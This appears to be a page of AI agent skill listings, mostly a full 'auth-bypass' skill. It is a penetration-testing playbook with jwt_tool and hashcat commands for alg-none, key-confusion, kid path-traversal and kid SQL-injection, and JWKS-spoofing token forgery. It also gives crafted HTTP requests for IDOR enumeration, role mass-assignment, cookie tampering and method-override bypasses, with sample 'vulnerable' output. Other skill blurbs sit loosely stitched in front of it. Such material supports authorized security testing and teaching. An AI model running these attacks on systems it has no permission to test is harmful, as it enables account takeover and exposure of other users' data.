// Test for authentication bypass, broken access control, IDOR, and JWT vulnerabilities. Use when testing authorization controls, when escalating privileges, when manipulating tokens, or when the user needs to verify access control implementation.
Creating algorithmic art using p5.js with seeded randomness and interactive parameter exploration. Use this when users request creating art using code, generative art, algorithmic art, flow fields, or particle systems. Create original algorithmic art rather than copying existing artists' work to avoid copyright violations.
Interactive system flow tracing across CODE, API, AUTH, DATA, NETWORK layers with SQLite persistence and Mermaid export. Use for security audits, compliance documentation, flow tracing, feature ideation, brainstorming, debugging, architecture reviews, or incident post-mortems. Triggers on audit, trace flow, document flow, security review, debug flow, brainstorm, architecture review, post-mortem, incident review.
When editing, creating, writing content and articles to avoid AI writing patterns ("AI-isms") that make text sound machine-generated. Follow the guidelines in the skill description to audit, rewrite, and summarize changes.
Write, review, and improve blog posts for the Sentry engineering blog following Sentry's specific writing standards, voice, and quality bar. Use this skill whenever someone asks to write a blog post, draft a technical article, review blog content, improve a draft, write a...
Applies Anthropic's official brand colors and typography to any sort of artifact that may benefit from having Anthropic's look-and-feel. Use it when brand colors or style guidelines, visual formatting, or company design standards apply.
Caching strategies — invalidation, TTL guidelines, cache keys, cache layers, and when not to cache. Use when implementing or reviewing caching logic.
| name | auth-bypass |
| description | Test for authentication bypass, broken access control, IDOR, and JWT vulnerabilities. Use when testing authorization controls, when escalating privileges, when manipulating tokens, or when the user needs to verify access control implementation. |
| tags | ["security","authentication","bypass","access-control","idor","jwt"] |
| triggers | ["auth bypass","authentication bypass","broken access control","jwt attack","session hijacking"] |
# JWT attack - Run all tests
python3 jwt_tool.py -M at \
-t "https://api.example.com/api/v1/user/123" \
-rh "Authorization: Bearer eyJhbG..."
Identify Authentication Mechanism
Determine what auth is used:
eyJ prefix)Extract and Decode Tokens
# Decode JWT without verification
python3 jwt_tool.py eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...
Test JWT Vulnerabilities
# Run all JWT attacks
python3 jwt_tool.py -M at \
-t "https://target.com/api/user" \
-rh "Authorization: Bearer TOKEN"
Test IDOR Patterns
Modify object references in requests:
/api/user/123 → /api/user/124id=1, id=2, id=3...Test Privilege Escalation
Manipulate role indicators:
role=user → role=adminisAdmin=false → isAdmin=trueDocument Findings
Record successful bypasses with:
Remove signature verification:
# Set algorithm to none
python3 jwt_tool.py TOKEN -X a
# Manual: Change header
# {"alg":"none","typ":"JWT"}
# Remove signature portion (third part after second dot)
CVE-2016-5431/CVE-2016-10555:
# Get server's public key
openssl s_client -connect target.com:443 2>&1 < /dev/null | \
sed -n '/-----BEGIN/,/-----END/p' > cert.pem
# Extract public key
openssl x509 -pubkey -in cert.pem -noout > pubkey.pem
# Sign with public key as HMAC secret
python3 jwt_tool.py TOKEN -X k -pk pubkey.pem
Path traversal:
# Use /dev/null as key (empty string)
python3 jwt_tool.py TOKEN -I -hc kid -hv "../../dev/null" -S hs256 -p ""
# Use predictable file content
python3 jwt_tool.py TOKEN -I -hc kid -hv "../../proc/sys/kernel/randomize_va_space" -S hs256 -p "2"
SQL injection via kid:
kid: non-existent' UNION SELECT 'ATTACKER';-- -
# Generate new key pair
openssl genrsa -out keypair.pem 2048
openssl rsa -in keypair.pem -pubout -out publickey.crt
# Host JWKS on controlled server
# Modify jku header to point to your JWKS URL
python3 jwt_tool.py TOKEN -X s
hashcat -a 0 -m 16500 jwt.txt wordlist.txt
python3 jwt_tool.py TOKEN -C -d wordlist.txt
GET /api/orders/1001 HTTP/1.1 # Original
GET /api/orders/1000 HTTP/1.1 # Other IDs
GET /api/orders/1002 HTTP/1.1
GET /api/documents/550e8400-e29b-41d4-a716-446655440000 # Original
GET /api/documents/660e8400-e29b-41d4-a716-446655440001 # Other user's
GET /api/profile?user_id=123&user_id=456
{"user_id": [123, 456]}
POST /api/admin/users HTTP/1.1
PUT /api/admin/users HTTP/1.1
DELETE /api/admin/users HTTP/1.1
POST /api/register HTTP/1.1
Content-Type: application/json
{"username": "test", "role": "admin", "isAdmin": true}
GET /admin HTTP/1.1
GET /api/admin/users HTTP/1.1
GET /dashboard/admin HTTP/1.1
GET /management HTTP/1.1
GET /internal/config HTTP/1.1
# Modify role in cookie
Cookie: session=abc123; role=admin; isStaff=1
# Base64 encoded cookies - decode, modify, re-encode
Cookie: userdata=eyJ1c2VyIjoiam9obiIsInJvbGUiOiJhZG1pbiJ9
| Attack | Test Method |
|---|---|
| Session Fixation | Force session ID before auth |
| Token Reuse | Replay password reset tokens |
| Expired Tokens | Use tokens after expiry |
| Race Conditions | Concurrent requests during auth |
Scenario: Test if server accepts unsigned JWT
Command:
python3 jwt_tool.py eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwicm9sZSI6InVzZXIifQ.signature -X a
Output:
[*] Algorithm set to none
[*] New token:
eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwicm9sZSI6InVzZXIifQ.
Scenario: Automated JWT vulnerability scan
Command:
python3 jwt_tool.py -M at \
-t "https://api.target.com/v1/me" \
-rh "Authorization: Bearer eyJhbG..."
Output:
[*] Running all attacks...
[+] VULNERABLE: Algorithm none accepted!
[+] VULNERABLE: Signature not verified!
[-] NOT VULNERABLE: Key confusion attack
Scenario: Access another user's profile
Original Request:
GET /api/users/profile/1001 HTTP/1.1
Authorization: Bearer TOKEN
Modified Request:
GET /api/users/profile/1002 HTTP/1.1
Authorization: Bearer TOKEN
Vulnerable Response:
{
"id": 1002,
"email": "otheruser@example.com",
"name": "Jane Doe"
}
Scenario: Elevate privileges during profile update
Request:
POST /api/user/update HTTP/1.1
Content-Type: application/json
Authorization: Bearer TOKEN
{
"name": "Attacker",
"email": "attacker@test.com",
"role": "admin",
"isAdmin": true
}
Command:
hashcat -a 0 -m 16500 "eyJhbG...TOKEN..." /usr/share/wordlists/rockyou.txt
Output:
eyJhbG...TOKEN...:secret123
Status...........: Cracked
Request:
GET /api/admin/users HTTP/1.1
Cookie: session=regular-user-session
Vulnerable Response:
{
"users": [
{ "id": 1, "email": "admin@test.com", "role": "admin" },
{ "id": 2, "email": "user@test.com", "role": "user" }
]
}
Scenario: Use predictable file as signing key
Command:
python3 jwt_tool.py eyJhbGciOiJIUzI1NiIsImtpZCI6ImtleXMva2V5MSJ9... \
-I -hc kid -hv "../../../dev/null" \
-S hs256 -p ""
Output:
[+] New token with kid pointing to /dev/null:
eyJhbGciOiJIUzI1NiIsImtpZCI6Ii4uLy4uLy4uL2Rldi9udWxsIn0...
Scenario: Bypass method-based access control
Request:
POST /api/admin/delete-user HTTP/1.1
X-HTTP-Method-Override: DELETE
X-Method-Override: DELETE
X-HTTP-Method: DELETE
Content-Type: application/json
{"user_id": 123}
Scenario: Access multiple resources in one request
Request:
POST /api/orders/export HTTP/1.1
Content-Type: application/json
{
"order_ids": [1001, 1002, 1003, 2001, 2002]
}
Scenario: Manipulate decoded cookie value
Original Cookie:
userdata=eyJ1c2VyIjoiYm9iIiwicm9sZSI6InVzZXIifQ==
# Decoded: {"user":"bob","role":"user"}
Modified Cookie:
userdata=eyJ1c2VyIjoiYm9iIiwicm9sZSI6ImFkbWluIn0=
# Decoded: {"user":"bob","role":"admin"}
| Flag | Description |
|---|---|
-M at | All tests mode |
-X a | Algorithm none attack |
-X k | Key confusion attack |
-X s | JWKS spoofing |
-C | Crack mode |
-d FILE | Dictionary for cracking |
-I | Inject claims |
-hc CLAIM | Header claim to modify |
-hv VALUE | New header value |
-pc CLAIM | Payload claim to modify |
-pv VALUE | New payload value |
-S hs256 | Sign with HS256 |
-S hs384 | Sign with HS384 |
-S hs512 | Sign with HS512 |
-p SECRET | Password/secret for signing |
-pk FILE | Public key file |
-t URL | Target URL |
-rh HEADER | Request header |
-rc COOKIE | Request cookie |
-T | Tamper token |
| Endpoint Pattern | Test |
|---|---|
/api/user/{id} | Change ID |
/api/orders/{order_id} | Sequential IDs |
/api/documents/{uuid} | UUID enumeration |
/api/profile | Add user_id param |
/api/settings | Add account_id param |
/download?file={id} | Path traversal |
/export?ids= | Array manipulation |
| Error | Cause | Resolution |
|---|---|---|
401 Unauthorized | Invalid/expired token | Get fresh token |
403 Forbidden | Access denied | Try different bypass |
jwt_tool not found | Tool not installed | pip install jwt_tool |
Invalid signature | Secret incorrect | Try different secrets |
Token expired | Exp claim passed | Modify exp claim |
Algorithm not allowed | Server blocks alg | Try other algorithms |